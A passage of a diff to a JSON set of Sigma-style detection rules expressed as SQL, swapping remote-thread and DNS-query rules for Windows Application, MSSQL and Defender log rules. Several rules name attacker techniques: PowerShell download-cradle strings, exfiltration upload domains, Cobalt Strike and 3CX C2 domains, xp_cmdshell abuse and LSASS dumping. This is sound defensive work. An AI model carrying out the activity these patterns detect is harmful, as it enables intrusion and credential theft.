"c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of 
processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1055" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR 
SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "status": "experimental", + "description": "Detects windows error reporting event where the process that crashed is lsass. 
This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE 
'\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", - "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "test", + "description": "Detects backup catalog deletions", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_susp_backup_delete.yml" }, { - "title": "WMI Event Subscription", - "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "status": "test", - "description": "Detects creation of WMI event subscription persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.execution" ], "falsepositives": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE EventID IN ('19', '20', '21')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_event_subscription.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrative scripts" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE 
'% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure 
Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "status": "experimental", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": 
"critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", + "status": "experimental", + "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + 
"description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "title": "PSExec and WMI Process Creations Block", + "id": 
"97b9ce1e-c5ab-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "Suspicious LDAP Domain Access", - "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "status": "experimental", - "description": "Detect suspicious LDAP request from non-Windows application", - "author": "frack113", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Programs that also lookup the observed domain" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows 
Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_susp_ldap.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + 
"description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Suspicious DNS Query for IP Lookup Service APIs", - "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "status": "test", - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", - "author": "Brandon George (blog post), Thomas Patzke (rule)", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.reconnaissance", - "attack.t1590" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of ip lookup services such as ipify API" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName IN ('canireachthe.net', 'ipv4.icanhazip.com', 'ip.anysrc.net', 'edns.ip-api.com', 'wtfismyip.com', 'checkip.dyndns.org', 'api.2ip.ua', 'icanhazip.com', 'api.ipify.org', 'ip-api.com', 'checkip.amazonaws.com', 'ipecho.net', 'ipinfo.io', 'ipv4bot.whatismyipaddress.com', 'freegeoip.app', 'ifconfig.me', 'ipwho.is') AND NOT ((NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 
